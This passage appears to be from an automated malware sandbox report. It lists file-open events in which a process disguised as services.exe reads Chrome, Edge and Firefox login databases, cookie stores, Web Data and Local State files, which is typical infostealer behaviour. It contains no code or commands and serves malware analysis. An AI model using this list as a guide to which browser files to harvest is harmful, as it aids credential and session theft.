                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
